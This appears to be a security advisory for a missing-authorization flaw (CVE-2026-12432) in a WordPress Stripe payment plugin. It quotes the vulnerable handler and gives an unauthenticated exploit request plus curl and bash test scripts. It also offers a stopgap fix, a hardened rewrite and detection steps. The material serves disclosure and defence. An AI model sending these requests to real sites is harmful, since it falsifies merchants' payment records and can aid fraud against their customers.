## https://sploitus.com/exploit?id=PACKETSTORM:224503
# CVE-2026-12432: WP Full Stripe Free <= 8.4.3 - Missing Authorization
## Overview
- **CVE ID**: CVE-2026-12432
- **CVSS Score**: 5.3 (Medium)
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
- **Affected**: Stripe Payment Forms by WP Full Pay <= 8.4.3
- **Patched**: >= 8.4.4
- **Published**: June 26, 2026
- **Last Updated**: June 27, 2026
- **Researcher**: Netwurm - VTDR e.V.i.G.
## Vulnerability Description
The WP Full Stripe Free plugin for WordPress is vulnerable to **Missing Authorization** in versions up to, and including, **8.4.3** via the `wpfs_update_failed_payment_status` AJAX action.
### Root Cause
The vulnerable AJAX endpoint is registered through both the `wp_ajax_` and `wp_ajax_nopriv_` hooks, so WordPress dispatches it to `admin-ajax.php` callers whether or not they are logged in:
```php
// wpfs-customer.php, Line 705-706
add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
```
The `update_failed_payment_status()` function (Line 3835-3865) performs:
- **NO capability check** (no `current_user_can()`)
- **NO nonce verification** (no `wp_verify_nonce()` / `check_ajax_referer()`)
- **NO logged-in check** (no `is_user_logged_in()`)
### Vulnerable Code
```php
// wpfs-customer.php, Line 3835-3865
function update_failed_payment_status() {
    try {
        $result          = [];
        $failureCode     = isset( $_POST['failureCode'] ) ? sanitize_text_field( $_POST['failureCode'] ) : null;
        $failureMessage  = isset( $_POST['failureMessage'] ) ? sanitize_text_field( $_POST['failureMessage'] ) : null;
        $paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;
        // Retrieved with the site's own Stripe key; $lastCharge is derived from $paymentIntent in elided code
        $paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
        // ... no auth check before processing ...

        // The local record for whatever id the caller supplied is marked unpaid unconditionally
        $updateData = [
            'paid'     => 0,
            'captured' => 0,
            'refunded' => 0
        ];
        if ( $lastCharge ) {
            // Charge details come from Stripe
            $updateData['last_charge_status'] = $lastCharge->status;
            $updateData['failure_code']       = $lastCharge->failure_code;
            $updateData['failure_message']    = $lastCharge->failure_message;
        } else {
            // No charge on the intent: the caller's failureCode/failureMessage are stored verbatim
            $updateData['last_charge_status'] = 'failed';
            $updateData['failure_code']       = $failureCode;
            $updateData['failure_message']    = $failureMessage;
        }
        $this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
        // ...
    } // ... catch block elided ...
}
```
## Attack Vector
### Prerequisites
- A Payment Intent ID must be known (exposed in the browser during a normal Stripe checkout); it must be a real PaymentIntent on the site's Stripe account, because the handler retrieves it with the site's key before writing, and it must match a row in the plugin's payment table for the update to change anything
- No authentication required
### Attack Steps
1. **Identify Target**: Find WordPress site with WP Full Stripe Free <= 8.4.3 installed
2. **Obtain Payment Intent ID**: Extract from Stripe.js checkout flow or prior transactions
3. **Send Malicious Request**: Craft POST request to admin-ajax.php with attacker-controlled parameters
### HTTP Request
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=wpfs_update_failed_payment_status&paymentIntentId=pi_XXXX&failureCode=ATTACKER_CODE&failureMessage=ATTACKER_MESSAGE
```
## Impact Assessment
| Impact Area | Severity | Description |
|-------------|----------|-------------|
| **Integrity** | Low (I:L) | Attackers can flip the plugin's local record of a successful payment to "failed"; the Stripe charge itself is untouched |
| **Confidentiality** | None (C:N) | No data exposure |
| **Availability** | None (A:N) | The endpoint does not affect availability; operational disruption from falsified records is an integrity consequence |
### Specific Impacts
1. **Payment Record Manipulation**: Attacker can change the plugin's stored payment status from "paid" to "failed" (`paid`, `captured`, `refunded` are all zeroed)
2. **False Failure Codes**: When the intent has no charge, attacker-supplied failure codes/messages are stored verbatim
3. **Social Engineering**: Falsified records could be used to defraud customers or support disputes of legitimate charges
4. **Audit Trail Corruption**: Business records diverge from what Stripe holds
## Proof of Concept (curl)
### Basic Detection
```bash
# Test if endpoint is accessible without authentication
curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
  -d "action=wpfs_update_failed_payment_status" \
  -d "paymentIntentId=test_cve202612432" \
  -d "failureCode=TEST_CODE" \
  -d "failureMessage=TEST_MESSAGE"
# Expected response (vulnerable):
# {"success":false,"messageTitle":"Internal Error","message":"Invalid API Key provided...","exceptionMessage":"..."}
# The exact message depends on the site's Stripe configuration (here no valid key was set;
# a configured site throws a different Stripe exception for a made-up id). The key indicator
# is a JSON body at all: WordPress answers a bare "0" when an action is not registered, so JSON
# means the handler ran for an unauthenticated request. A patched build may also answer JSON
# after rejecting the request, so confirm the installed version before calling it vulnerable.
```
### Full PoC Script
```bash
#!/bin/bash
TARGET="https://TARGET"
# Check if vulnerable
echo "[*] Testing CVE-2026-12432..."
RESPONSE=$(curl -s -k -X POST "$TARGET/wp-admin/admin-ajax.php" \
  -d "action=wpfs_update_failed_payment_status" \
  -d "paymentIntentId=test_123" \
  -d "failureCode=TEST_CODE" \
  -d "failureMessage=TEST_MESSAGE")
if [ "$RESPONSE" = "0" ]; then
  echo "[-] Action not registered (plugin absent or inactive)"
elif echo "$RESPONSE" | grep -q '"success"'; then
  echo "[+] Handler executed for an unauthenticated request - likely vulnerable (confirm version <= 8.4.3)"
else
  echo "[-] Unexpected response: $RESPONSE"
fi
```
## Remediation
### Immediate Fix
The handler is reachable by anonymous customers by design (the `nopriv` hook exists so the Stripe.js checkout can report a failed attempt), so a bare capability check like the one below closes the hole at the cost of that flow. Use it only as a stopgap in `wpfs-customer.php` at line 3835 until the vendor update is applied:
```php
function update_failed_payment_status() {
    // ADD THIS CHECK (blocks anonymous callers, including legitimate checkouts)
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Unauthorized' );
    }
    // ... rest of function
}
```
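A fix that keeps the anonymous checkout working has to stop trusting the browser about the outcome rather than gate on who is calling. The following is an added example, not the vendor's 8.4.4 patch: a hardened method body for `update_failed_payment_status()` that verifies a nonce, validates the id shape, and then records a failure only when Stripe itself reports the PaymentIntent as failed, taking the failure details from Stripe's `last_payment_error` instead of the POSTed `failureCode`/`failureMessage`. The nonce action name `wpfs_checkout` and the `nonce` POST field are assumptions (the advisory names neither), as is the assumption that the checkout script receives the nonce via `wp_localize_script()`; `$this->stripe` and `$this->db` are the collaborators the original handler already uses.

```php
// Added example (not the plugin's code). Runs as a method on the same class as
// the original handler, so $this->stripe and $this->db are available.
// ASSUMED: nonce action 'wpfs_checkout' delivered to the checkout script via
// wp_localize_script() and posted back in a 'nonce' field.
function update_failed_payment_status() {
    // 1. The request must carry a nonce minted by a page this plugin rendered.
    //    An anonymous visitor can still read that nonce from the checkout page,
    //    so this only stops blind off-site requests; the real control is step 3.
    if ( ! check_ajax_referer( 'wpfs_checkout', 'nonce', false ) ) {
        wp_send_json_error( [ 'message' => 'Invalid request' ], 403 );
    }

    $paymentIntentId = isset( $_POST['paymentIntentId'] )
        ? sanitize_text_field( wp_unslash( $_POST['paymentIntentId'] ) )
        : '';

    // 2. PaymentIntent ids have a fixed shape; reject junk before it costs a
    //    Stripe API call (the original passed whatever string arrived).
    if ( ! preg_match( '/^pi_[A-Za-z0-9]+$/', $paymentIntentId ) ) {
        wp_send_json_error( [ 'message' => 'Invalid payment intent id' ], 400 );
    }

    try {
        // 3. Ask Stripe, using the site's own secret key, what actually happened.
        //    A made-up id or one from another Stripe account throws here.
        $paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
    } catch ( \Exception $e ) {
        wp_send_json_error( [ 'message' => 'Could not verify payment' ], 502 );
    }

    // Only a PaymentIntent that Stripe reports as failed may be recorded as such.
    // 'requires_payment_method' is the state Stripe returns after a declined
    // attempt; 'succeeded', 'processing' and the other 'requires_*' states are
    // left untouched, so a paid order can never be flipped by the client.
    $failedStates = [ 'requires_payment_method', 'canceled' ];
    if ( ! in_array( $paymentIntent->status, $failedStates, true ) ) {
        wp_send_json_error( [ 'message' => 'Payment is not in a failed state' ], 409 );
    }

    // 4. Failure details come from Stripe's last_payment_error; the client's
    //    failureCode/failureMessage fields are ignored entirely.
    $lastError  = $paymentIntent->last_payment_error;
    $updateData = [
        'paid'               => 0,
        'captured'           => 0,
        'refunded'           => 0,
        'last_charge_status' => 'failed',
        'failure_code'       => $lastError->code ?? null,
        'failure_message'    => $lastError->message ?? null,
    ];

    $this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
    wp_send_json_success( [ 'status' => $paymentIntent->status ] );
}
```

The ordering matters: the cheap checks (nonce, id shape) run before the Stripe round trip, and the write is only reached on a state Stripe itself reports. Because the anonymous nonce is readable by anyone who loads the checkout page, the nonce alone would not have prevented this issue; step 3 is what removes the attacker's ability to mark an arbitrary paid order as failed.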
### Recommended Fix (by vendor)
Update to **WP Full Stripe Free >= 8.4.4**
```bash
# Via WordPress Admin
# Dashboard > Plugins > WP Full Stripe > Update
# Via WP-CLI (latest release)
wp plugin update wp-full-stripe-free
# Via WP-CLI, pinned to the first fixed release
wp plugin update wp-full-stripe-free --version=8.4.4
```
## Detection
### Manual Check
1. Check the plugin version in WordPress admin
2. Review `wp-content/plugins/wp-full-stripe-free/includes/wpfs-customer.php`
3. Confirm whether `update_failed_payment_status()` begins with a nonce or capability check before it touches `$_POST` and the database
### Automated Detection
```bash
# Check which version is installed (readme.txt ships with the plugin, so its
# Stable tag reflects the installed release when the file is web-readable)
curl -s https://TARGET/wp-content/plugins/wp-full-stripe-free/readme.txt | grep -i "Stable tag"
# Test AJAX endpoint: a JSON body means the handler executed without auth;
# a bare "0" means the action is not registered at all
curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
  -d "action=wpfs_update_failed_payment_status" \
  -d "paymentIntentId=test" | grep -q '"success"' && echo "Potentially Vulnerable"
```
## References
- [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/cve-2026-12432)
- [Plugin Trac](https://plugins.trac.wordpress.org/browser/wp-full-stripe-free/tags/8.4.3/includes/wpfs-customer.php)
- [Patchstack Database](https://patchstack.com/database/)
## W.P.E.F
- [W.P.E.F Telegram channel #1](https://t.me/wpef0)
- [W.P.E.F Telegram channel #2](https://t.me/wpef01)
## Timeline
- **June 26, 2026**: Vulnerability publicly disclosed
- **June 27, 2026**: CVE-2026-12432 published
- **Patch**: Update to >= 8.4.4